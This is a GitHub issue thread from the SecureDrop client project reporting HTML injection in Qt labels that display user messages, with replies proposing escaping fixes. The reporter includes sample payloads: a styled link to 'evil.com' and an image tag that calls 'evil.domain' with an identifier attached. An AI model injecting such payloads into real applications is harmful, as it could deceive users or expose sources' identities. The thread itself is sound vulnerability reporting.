### ISSUE TITLE
Security issue - HTML injection

### ISSUE THREAD

**Issue by timruffles** [freedomofpress/securedrop-client#160]
QT supports HTML in `QLabel` etc. It seems sensible to disable it for all user input.

It could be used to, for example, insert links that unsuspecting users can click, perhaps styled to look like normal text or application UI. Here I added `<style>a { color: red }</style><a href="evil.com">I am a link</a>` to the message content:

![screen shot 2018-11-11 at 16 21 07](https://user-images.githubusercontent.com/249800/48320347-e0f4dc00-e5cd-11e8-8733-45bcef5762d5.png)

Luckily remote images don't seem to be loaded, so this kind of attack won't work:

```
My submission - <img src='http://evil.domain?uuid=xxx' />
```

It seems sensible to create some safe sub-classes of `QLabel` etc which use plain text, e.g `UserCreatedText`, and audit all text presentation.

**Comment by redshiftzero** [comment]
[Jinja2 escaping](http://jinja.pocoo.org/docs/2.10/templates/#escape) is a good way to sanitize the messages, replies, username field when displaying

**Comment by joshuathayer** [comment]
Any reason not to use `html.escape`? https://docs.python.org/3/library/html.html

**Comment by emkll** [comment]
According to the docs QLabel's setText only supports text or rich text (subset of HTML4) http://pyqt.sourceforge.net/Docs/PyQt4/qlabel.html. `html.escape` should be sufficient as long as we continue to use Qlabel.
